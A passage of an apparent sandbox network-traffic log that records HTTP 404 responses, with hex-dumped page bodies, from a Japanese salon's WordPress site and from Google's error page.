74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:26:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 33 62 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:26:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Wed, 24 Apr 2024 05:26:46 GMTConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Wed, 24 Apr 2024 05:26:49 GMTConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Wed, 24 Apr 2024 05:26:52 GMTConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Wed, 24 Apr 2024 05:26:55 GMTConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 7
